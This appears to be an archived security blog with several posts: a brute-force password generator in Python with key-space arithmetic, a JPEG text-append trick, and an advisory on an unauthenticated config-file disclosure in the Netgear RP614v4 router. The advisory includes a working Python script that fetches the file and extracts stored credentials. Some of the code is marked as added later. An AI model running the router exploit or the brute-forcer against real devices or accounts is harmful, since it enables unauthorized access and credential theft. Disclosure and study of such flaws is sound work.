All posts by zitstif

Resilient SSH Tunneled Meterpreter Session –pauldotcom

Persistent SSH Tunneled Meterpreter from PaulDotCom on Vimeo.

http://pauldotcom.com/2010/03/resilient-ssh-tunneled-meterpr.html

Nifty method; however, I would argue that storing the password for your SSH server in clear text probably isn’t the best idea, and if you’re forced to do this, then the account whose password is exposed should be severely limited in privileges.

Keep up the good work, PaulDotCom. 🙂

More to come..

Bruting passwords, how simple of a program to write..

Passwords: who doesn’t have at least one password that they can think of? We rely on them for our privacy and for keeping information confidential. However, passwords can be guessed via dictionary attacks and even by brute force.

Brute forcing passwords is not the most efficient way of gaining access to an account during an audit or pentest, particularly against network authentication.

Traditional brute forcing on a single core (or even a multi-core) processor isn’t the most efficient approach; distributed computing is now the way of the future and makes brute force attacks far more realistic.

One great example of this currently in practice (at a small cost): individuals now have access to WPA password cracking via:
http://www.wpacracker.com/

I decided to write a program in C, just as a fun task. The program generates password combinations over a range of characters, from 4 characters long to 10 characters long. I chose this range after reading this:
http://www.schneier.com/essay-144.html

My program (which is located here:)

http://zitstif.no-ip.org/c/bruteme.txt

will cover 94.92% of passwords according to this study; however, there is one caveat: I left out the ‘space’ character from the array of characters.

Bear in mind that the longer the password, the longer it takes to come up with the combination. I wrote this as more of a simple PoC.
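To show why length dominates, here is an added example of the same idea in Python. It is not the bruteme.c program linked above: it enumerates the key space the same way (every combination of an alphabet between two lengths), computes how large that space is and how long exhausting it would take at an assumed guess rate, and finds a target with a pluggable check. The 94-character alphabet (letters, digits and punctuation, no space) matches the post’s description; the 1e9 guesses per second figure and the SHA-256 check are assumptions standing in for a real cracking rate and a real login or hash test.

```python
"""Added example (not the author's bruteme.c): enumerate a password key space
and measure how fast it grows with length and alphabet size."""
import hashlib
import string
from itertools import product
from typing import Callable, Iterator, Optional, Tuple

# 94 printable ASCII characters: letters, digits and punctuation, with the
# space character left out as the post describes.
PRINTABLE_94 = string.ascii_letters + string.digits + string.punctuation


def candidates(alphabet: str, min_len: int, max_len: int) -> Iterator[str]:
    """Yield every string of length min_len..max_len over `alphabet`,
    shortest first; within one length the last position changes fastest."""
    for length in range(min_len, max_len + 1):
        for chars in product(alphabet, repeat=length):
            yield "".join(chars)


def keyspace_size(alphabet_size: int, min_len: int, max_len: int) -> int:
    """Number of candidates: sum of alphabet_size**n for n in min_len..max_len."""
    return sum(alphabet_size ** n for n in range(min_len, max_len + 1))


def seconds_to_exhaust(alphabet_size: int, min_len: int, max_len: int,
                       guesses_per_second: float) -> float:
    """Worst-case time to try the whole space at an assumed guess rate."""
    return keyspace_size(alphabet_size, min_len, max_len) / guesses_per_second


def brute_find(alphabet: str, min_len: int, max_len: int,
               check: Callable[[str], bool]) -> Tuple[Optional[str], int]:
    """Try candidates until `check` accepts one. Returns (match, guesses_made);
    match is None when the target is outside the space (too long, or it uses a
    character the alphabet lacks), in which case every candidate was tried."""
    tried = 0
    for cand in candidates(alphabet, min_len, max_len):
        tried += 1
        if check(cand):
            return cand, tried
    return None, tried


def sha256_hex(s: str) -> str:
    return hashlib.sha256(s.encode()).hexdigest()


def sha256_checker(target_hex: str) -> Callable[[str], bool]:
    """Offline stand-in for a real check (a login attempt, a hash comparison):
    accept the candidate whose SHA-256 matches `target_hex`."""
    return lambda cand: sha256_hex(cand) == target_hex


if __name__ == "__main__":
    for name, size in (("lowercase letters", 26),
                       ("94 printable ASCII", len(PRINTABLE_94))):
        secs = seconds_to_exhaust(size, 4, 10, 1e9)   # assumed rate
        print(f"{name:>20}, 4..10 chars: {keyspace_size(size, 4, 10):.3e} "
              f"candidates, {secs / 86400:.1f} days at 1e9 guesses/s")
    # constructed target: a 3-letter password over a 3-letter alphabet
    print(brute_find("abc", 1, 3, sha256_checker(sha256_hex("cab"))))
```

Running it shows the point of the post in numbers: 26 lowercase letters at 4 to 10 characters is about 1.5e14 candidates (under two days at the assumed rate), while the 94-character alphabet at the same lengths exceeds 2^64 candidates, which is why the author notes that longer passwords take longer and why distributed cracking matters.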

Users who rely on password authentication and want to keep their accounts secure should keep this in mind:

*   Use long passwords that you can remember
*   Don’t write down your password or store it in a clear text file.
*   Don’t use the same password over and over
*   Do not share your password with others
*   If you can, use special characters, but make sure you can remember your password.
*   Do not use easily guessable passwords
*   Be very careful about which secret questions you use if you ever have to reset a forgotten password
*   Try to change your passwords at a regular interval
*   Do not do any remote authentication on public wireless networks
*   Have multiple e-mail accounts: one for purchasing things online and one for other matters

You might ask yourself, “Why should I not do any remote authentication on public wireless networks?” I advise this because most public wireless networks I’ve encountered have taken no precautions to prevent ARP poisoning. If you use VPNs or SSH tunneling, you’ll mitigate your risks, but I would still advise against authenticating on public networks.

One possible risk of relying on SSH tunneling is giving away your server’s public IP (via ‘side channel attacks’). This could potentially make your server a target for various other attacks. Along with that, there is also the risk of SSH downgrade attacks (I believe I’ve posted a link to this before: http://openmaniak.com/ettercap_filter.php).

Also, for possible attacks / risks on VPN networks, have a look at this:
http://my.safaribooksonline.com/1931841810/ch10lev1sec260#X2ludGVybmFsX0ZsYXNoUmVhZGVyP3htbGlkPTE5MzE4NDE4MTAvMjUxJmltYWdlcGFnZT0yNTE=

As for multiple e-mail accounts, I believe this is a great precaution in case one account is breached: this way the attacker won’t have access to all the other accounts to reset passwords. However, this depends on how your e-mail accounts are set up, so do be careful.

More to come…

Extremely Simple Steganography

Dabbling with the command line one day, I thought to myself, “Can’t I append text to a picture and, at a later time, read the text back from the image?”

By simply using ‘>>’ under Windows and Linux, you can append text to a picture file (a JPEG, for example). Bear in mind that this changes the hash sum of the file. Lastly, I’ve only tested this with JPEG images.

Here’s an example:

We have a file called ‘linux.jpg’ from, http://www.bose.res.in/~kapil/linux.jpg

By simply invoking:

echo "Secret Message:  toor" >> linux.jpg

To find our “Secret Message”, simply invoke the following:

egrep -a 'Secret' linux.jpg

If you’re using ‘xterm’, your output may look like this:

http://zitstif.no-ip.org/steg/steg.jpg

However, if you’re using something else and the output ‘borks’ your terminal so that it looks completely alien, use the reset command.

You can do this in Windows as well, but the command would look like this:

type linux.jpg | findstr "Secret"

Netgear RP614v4 exploit


Website/Company: http://zitstif.no-ip.org
E-mail: zitstif[at]gmail.com

Name: Kyle Young

Device:
Netgear RP614v4
Firmware version: v1.1.2_09.01
Firmware release date: November 2009
HTTP service: Boa HTTPd 0.93.15
Exploit release date: Wednesday March 24, 2010

Default router credentials:
username: admin
password: password

Scope: Local/Remote

Vulnerability:

The Netgear RP614v4 allows an end user to request the netgear.cfg file, which is located at:

http://[RouterIP]/vgn/jsp/netgear.cfg

This file is a plain text ASCII file that contains the router’s password at line 216, which looks similar to this:

http_passwd=myvulnerablepassword

You don’t have to authenticate to obtain this file at all.

The caveat with this exploit is that it works on the LAN the router is on, or remotely over the WAN only if the remote administration option is enabled (its default port is 8080).

PoC: http://zitstif.no-ip.org/rp614v4/rp614v4exploit.txt
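As an added example (not the author’s PoC above), the following Python script does what a practitioner would want when checking a device for this issue: an unauthenticated GET for the path the advisory gives, a test for whether the response is the plain text form (as on the RP614v4) or the binary/obfuscated form other routers return, and a parser that pulls credential-looking keys out of the key=value lines. The only line taken from the advisory is `http_passwd=`; the other keys in the sample config, the key-name pattern used to flag credentials, and the 95% printable threshold are assumptions.

```python
"""Added example (not the author's PoC): check a router for the unauthenticated
config-file disclosure and pull credentials out of a plain text netgear.cfg."""
import re
import urllib.error
import urllib.request
from typing import Dict, Optional

CONFIG_PATH = "/vgn/jsp/netgear.cfg"   # path from the advisory
# assumption: key names worth flagging (http_passwd, plus PPPoE user/password
# fields the author reports seeing in other routers' config files)
CREDENTIAL_KEY = re.compile(r"passwd|password|user", re.I)


def fetch_config(router: str, port: int = 80, timeout: float = 5.0) -> Optional[bytes]:
    """Plain GET with no credentials supplied. Returns the body, or None if
    the router refuses or does not answer (a WAN test uses the remote
    administration port, 8080 by default)."""
    url = f"http://{router}:{port}{CONFIG_PATH}"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read()
    except (urllib.error.URLError, OSError):
        return None


def is_plaintext(data: bytes) -> bool:
    """Distinguish the RP614v4's ASCII config from the binary or obfuscated
    dumps other routers return: no NUL bytes and mostly printable content."""
    if not data or b"\x00" in data:
        return False
    printable = sum(32 <= b < 127 or b in b"\t\r\n" for b in data)
    return printable / len(data) > 0.95   # assumed threshold


def parse_config(text: str) -> Dict[str, str]:
    """Parse key=value lines; blank lines, '#' comments and lines without
    '=' are skipped."""
    cfg: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        cfg[key.strip()] = value.strip()
    return cfg


def find_credentials(cfg: Dict[str, str]) -> Dict[str, str]:
    """Entries whose key matches CREDENTIAL_KEY."""
    return {k: v for k, v in cfg.items() if CREDENTIAL_KEY.search(k)}


def check_router(router: str, port: int = 80) -> Optional[Dict[str, str]]:
    """None if the file is not served; {} if it is served but is binary or
    has no credential-looking keys; otherwise the recovered credentials."""
    body = fetch_config(router, port)
    if body is None:
        return None
    if not is_plaintext(body):
        return {}
    return find_credentials(parse_config(body.decode("ascii", errors="replace")))


if __name__ == "__main__":
    # constructed sample config; only the http_passwd= line comes from the advisory
    sample = ("# netgear.cfg\nwan_proto=dhcp\n"
              "http_passwd=myvulnerablepassword\nlan_ipaddr=192.168.1.1\n")
    print(find_credentials(parse_config(sample)))
    # against a live device: print(check_router("192.168.1.1"))
```

A `None` from `check_router` (connection refused, timeout, or a 401/404) is the expected result for a router that does not expose the file; a non-empty dictionary reproduces the finding in the advisory without any login.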

Additional notes:

After discovering this vulnerability, I’ve noticed with other routers that have HTTP based administration that you can make requests for config files without authenticating. However, this does not always work, and at times the config file is obfuscated.

From my experience, most router config files are in a binary format and can be viewed with a program like ‘bvi’. At times, you can view credentials to the device and also PPPoE credentials.

I’m reporting this vulnerability to securityfocus.com, due to the lack of support on Netgear’s end.